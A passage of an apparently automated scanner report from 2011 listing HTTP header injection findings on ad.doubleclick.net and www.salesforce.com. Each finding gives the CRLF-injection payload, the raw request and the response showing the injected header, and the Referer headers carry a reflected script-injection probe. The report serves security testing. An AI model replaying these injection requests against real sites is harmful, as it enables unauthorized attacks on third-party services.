The value of REST URL parameter 1 is copied into the Location response header. The payload 365d7%0d%0ae3dbdb6049c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /365d7%0d%0ae3dbdb6049c/wn.nat.kwtv/news;sz=300x75;wnsz=44;tile=1;wncc=News;wnpt=S;wnpc=story;wncp=KWTV;wncid=14496495;wnad85=kwtv;wnad44=worldnow;wndomain=about%3Ablank;kw=E05511_10004;kw=E05511_50062;kw=E05511_50085;apptype=platform;env=production;ord=86636883? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/365d7
e3dbdb6049c
/wn.nat.kwtv/news;sz=300x75;wnsz=44;tile=1;wncc=News;wnpt=S;wnpc=story;wncp=KWTV;wncid=14496495;wnad85=kwtv;wnad44=worldnow;wndomain=about: blank;kw=E05511_10004;kw=E05511_50062;kw=E05511_50085;apptype=platform;env=production;ord=86636883
Date: Fri, 22 Apr 2011 16:04:12 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.18. http://ad.doubleclick.net/adj/wn.nat.kwtv/radio07 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.nat.kwtv/radio07

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5352f%0d%0a5f8bbb61a80 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5352f%0d%0a5f8bbb61a80/wn.nat.kwtv/radio07;sz=300x75;wnsz=44;tile=1;wncc=Radio%2007;wnpt=C;wnpc=category;wncp=KWTV;wncid=192772;wnad85=kwtv;wnad44=worldnow;wndomain=about%3Ablank;;apptype=platform;env=production;ord=58487014? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5352f
5f8bbb61a80
/wn.nat.kwtv/radio07;sz=300x75;wnsz=44;tile=1;wncc=Radio 07;wnpt=C;wnpc=category;wncp=KWTV;wncid=192772;wnad85=kwtv;wnad44=worldnow;wndomain=about: blank;;apptype=platform;env=production;ord=58487014
Date: Fri, 22 Apr 2011 15:30:43 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.19. http://ad.doubleclick.net/adj/wn.nat.kwtv/sales-environmental [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.nat.kwtv/sales-environmental

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4a0e3%0d%0a90648814a15 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4a0e3%0d%0a90648814a15/wn.nat.kwtv/sales-environmental;sz=300x75;wnsz=44;tile=1;wncc=Sales%20-%20Environmental;wnpt=S;wnpc=story;wncp=KWTV;wncid=5963519;wnad85=kwtv;wnad44=worldnow;wndomain=about%3Ablank;kw=E05511_10004;kw=E05511_50062;apptype=platform;env=production;ord=51921513? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4a0e3
90648814a15
/wn.nat.kwtv/sales-environmental;sz=300x75;wnsz=44;tile=1;wncc=Sales - Environmental;wnpt=S;wnpc=story;wncp=KWTV;wncid=5963519;wnad85=kwtv;wnad44=worldnow;wndomain=about: blank;kw=E05511_10004;kw=E05511_50062;apptype=platform;env=production;ord=51921513
Date: Fri, 22 Apr 2011 16:04:51 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.20. http://ad.doubleclick.net/adj/wn.nat.kwtv/station2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.nat.kwtv/station2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 430c9%0d%0a639c3de1328 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /430c9%0d%0a639c3de1328/wn.nat.kwtv/station2;sz=300x75;wnsz=44;tile=1;wncc=Station%202;wnpt=C;wnpc=category;wncp=KWTV;wncid=118245;wnad85=kwtv;wnad45=kwtv;wnad44=worldnow;wndomain=about%3Ablank;;apptype=platform;env=production;ord=58285658? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/430c9
639c3de1328
/wn.nat.kwtv/station2;sz=300x75;wnsz=44;tile=1;wncc=Station 2;wnpt=C;wnpc=category;wncp=KWTV;wncid=118245;wnad85=kwtv;wnad45=kwtv;wnad44=worldnow;wndomain=about: blank;;apptype=platform;env=production;ord=58285658
Date: Fri, 22 Apr 2011 15:34:23 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.21. http://ad.doubleclick.net/adj/wn.nat.kwtv/weather [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.nat.kwtv/weather

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6ef0e%0d%0aecce4cabbe6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6ef0e%0d%0aecce4cabbe6/wn.nat.kwtv/weather;sz=300x75;wnsz=44;tile=1;wncc=Weather;wnpt=C;wnpc=weather;wncp=KWTV;wncid=198140;wnad85=kwtv;wnad44=worldnow;wndomain=about%3Ablank;kw=E05511_10004;kw=E05511_50085;apptype=platform;env=production;ord=37923550? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6ef0e
ecce4cabbe6
/wn.nat.kwtv/weather;sz=300x75;wnsz=44;tile=1;wncc=Weather;wnpt=C;wnpc=weather;wncp=KWTV;wncid=198140;wnad85=kwtv;wnad44=worldnow;wndomain=about: blank;kw=E05511_10004;kw=E05511_50085;apptype=platform;env=production;ord=37923550
Date: Fri, 22 Apr 2011 15:53:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.22. http://www.salesforce.com/common/assets/css/styles.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/css/styles.css

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload d4838%0d%0a4aa22e57a0d was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /common/assets/css/d4838%0d%0a4aa22e57a0d?date=04.22.20114 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/css/d4838
4aa22e57a0d
/?date=04.22.20114
Date: Fri, 22 Apr 2011 15:26:22 GMT
Content-Length: 147

The URL has moved to <a href="/common/assets/css/d4838
4aa22e57a0d/?date=04.22.20114">/common/assets/css/d4838
4aa22e57a0d/?date=04.22.20114</a>

2.23. http://www.salesforce.com/common/assets/css/superfish.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/css/superfish.css

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload ebc7c%0d%0a3ed8cbad4a6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /common/assets/css/ebc7c%0d%0a3ed8cbad4a6?date=04.22.20112 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/css/ebc7c
3ed8cbad4a6
/?date=04.22.20112
Date: Fri, 22 Apr 2011 15:27:06 GMT
Content-Length: 147

The URL has moved to <a href="/common/assets/css/ebc7c
3ed8cbad4a6/?date=04.22.20112">/common/assets/css/ebc7c
3ed8cbad4a6/?date=04.22.20112</a>

2.24. http://www.salesforce.com/common/assets/js/global2.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/js/global2.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload ade59%0d%0a2fe7fd351ad was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /common/assets/js/ade59%0d%0a2fe7fd351ad?date=101221 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/js/ade59
2fe7fd351ad
/?date=101221
Date: Fri, 22 Apr 2011 15:26:11 GMT
Content-Length: 135

The URL has moved to <a href="/common/assets/js/ade59
2fe7fd351ad/?date=101221">/common/assets/js/ade59
2fe7fd351ad/?date=101221</a>

2.25. http://www.salesforce.com/common/assets/js/opinionlab/oo_engine.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/js/opinionlab/oo_engine.js

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 8d5c8%0d%0af90c3e609ab was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /common/assets/js/opinionlab/8d5c8%0d%0af90c3e609ab?date=110127 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751; fsr.a=1303485890905; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%7D

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/js/opinionlab/8d5c8
f90c3e609ab
/?date=110127
Date: Fri, 22 Apr 2011 15:28:55 GMT
Content-Length: 157

The URL has moved to <a href="/common/assets/js/opinionlab/8d5c8
f90c3e609ab/?date=110127">/common/assets/js/opinionlab/8d5c8
f90c3e609ab/?date=110127</a>

2.26. http://www.salesforce.com/common/assets/js/sf.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/js/sf.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload b2e21%0d%0adf42fdeb731 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /common/assets/js/b2e21%0d%0adf42fdeb731?date=04.22.20112 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/js/b2e21
df42fdeb731
/?date=04.22.20112
Date: Fri, 22 Apr 2011 15:26:18 GMT
Content-Length: 145

The URL has moved to <a href="/common/assets/js/b2e21
df42fdeb731/?date=04.22.20112">/common/assets/js/b2e21
df42fdeb731/?date=04.22.20112</a>

2.27. http://www.salesforce.com/common/assets/js/supersubs.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/js/supersubs.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 8db5a%0d%0a1d929d68ca9 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /common/assets/js/8db5a%0d%0a1d929d68ca9?date=04.22.20112 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/js/8db5a
1d929d68ca9
/?date=04.22.20112
Date: Fri, 22 Apr 2011 15:27:05 GMT
Content-Length: 145

The URL has moved to <a href="/common/assets/js/8db5a
1d929d68ca9/?date=04.22.20112">/common/assets/js/8db5a
1d929d68ca9/?date=04.22.20112</a>

2.28. http://www.salesforce.com/common/assets/thirdparty/foresee/foresee-surveydef.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/thirdparty/foresee/foresee-surveydef.js

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 1b145%0d%0a969e86ca9d3 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /common/assets/thirdparty/foresee/1b145%0d%0a969e86ca9d3 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; foresee.analytics=%7B%22rr_domain%22%3A%22www.salesforce.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221303485894523_6640%22%7D; fsr.s={"cp":{"siteLocale":"us","visitorType":"anonymous","segment":"non-customer:us","visitorTypeDetailed":"anonymous:no-trial","visitNumber":1,"previousPage":"SFDC:us:platform"}}; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]; fsr.a=1303485904836; s_sess=%20s_ppv_x%3D%3B%20s_cc%3Dtrue%3B%20c16%3Dflash%252010%257C%3B%20nve%3Dnve%3B%20v0%3DExternal%2520Websites%257Cburp%3B%20c22%3DExternal%2520Websites%3B%20v20%3DDirect%2520Landing%3B%20c24%3DExternal%2520Websites%257Cburp%3B%20c40%3DExternal%2520Websites%3B%20c48%3D12751%253A0%253A0%3B%20s_sq%3D%3B%20s_ppv%3D62%257C0%3B

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/thirdparty/foresee/1b145
969e86ca9d3
/
Date: Fri, 22 Apr 2011 15:30:37 GMT
Content-Length: 143

The URL has moved to <a href="/common/assets/thirdparty/foresee/1b145
969e86ca9d3/">/common/assets/thirdparty/foresee/1b145
969e86ca9d3/</a>

2.29. http://www.salesforce.com/common/assets/thirdparty/foresee/transport5.swf [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/thirdparty/foresee/transport5.swf

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload a931d%0d%0afc491a3fb54 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /common/assets/thirdparty/foresee/a931d%0d%0afc491a3fb54 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; fsr.a=1303485893905; foresee.analytics=%7B%22rr_domain%22%3A%22www.salesforce.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221303485894523_6640%22%7D; fsr.s={"cp":{"siteLocale":"us","visitorType":"anonymous","segment":"non-customer:us","visitorTypeDetailed":"anonymous:no-trial","visitNumber":1,"previousPage":"SFDC:us:platform"}}; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_sess=%20s_ppv%3D0%3B%20s_ppv_x%3D%3B%20s_cc%3Dtrue%3B%20c16%3Dflash%252010%257C%3B%20nve%3Dnve%3B%20v0%3DExternal%2520Websites%257Cburp%3B%20c22%3DExternal%2520Websites%3B%20v20%3DDirect%2520Landing%3B%20c24%3DExternal%2520Websites%257Cburp%3B%20c40%3DExternal%2520Websites%3B%20c48%3D12751%253A0%253A0%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/thirdparty/foresee/a931d
fc491a3fb54
/
Date: Fri, 22 Apr 2011 15:29:58 GMT
Content-Length: 143

The URL has moved to <a href="/common/assets/thirdparty/foresee/a931d
fc491a3fb54/">/common/assets/thirdparty/foresee/a931d
fc491a3fb54/</a>

2.30. http://www.salesforce.com/common/assets/thirdparty/omniture/s_code3.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/thirdparty/omniture/s_code3.js

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload f1f38%0d%0a9190a9037c9 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /common/assets/thirdparty/omniture/f1f38%0d%0a9190a9037c9?date=101221 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751; fsr.a=1303485890905; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%7D

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/thirdparty/omniture/f1f38
9190a9037c9
/?date=101221
Date: Fri, 22 Apr 2011 15:27:53 GMT
Content-Length: 169

The URL has moved to <a href="/common/assets/thirdparty/omniture/f1f38
9190a9037c9/?date=101221">/common/assets/thirdparty/omniture/f1f38
9190a9037c9/?date=101221</a>

2.31. http://www.salesforce.com/common/assets/thirdparty/pixels/pixel-manager.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/thirdparty/pixels/pixel-manager.js

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 1e04a%0d%0a284c4d986bb was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /common/assets/thirdparty/pixels/1e04a%0d%0a284c4d986bb?date=101221 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751; fsr.a=1303485890905; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%7D

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/thirdparty/pixels/1e04a
284c4d986bb
/?date=101221
Date: Fri, 22 Apr 2011 15:28:58 GMT
Content-Length: 165

The URL has moved to <a href="/common/assets/thirdparty/pixels/1e04a
284c4d986bb/?date=101221">/common/assets/thirdparty/pixels/1e04a
284c4d986bb/?date=101221</a>

2.32. http://www.salesforce.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload def3f%0d%0af5e9ff33902 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /def3f%0d%0af5e9ff33902 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; foresee.analytics=%7B%22rr_domain%22%3A%22www.salesforce.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221303485894523_6640%22%7D; fsr.s={"cp":{"siteLocale":"us","visitorType":"anonymous","segment":"non-customer:us","visitorTypeDetailed":"anonymous:no-trial","visitNumber":1,"previousPage":"SFDC:us:platform"}}; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]; fsr.a=1303485904836; 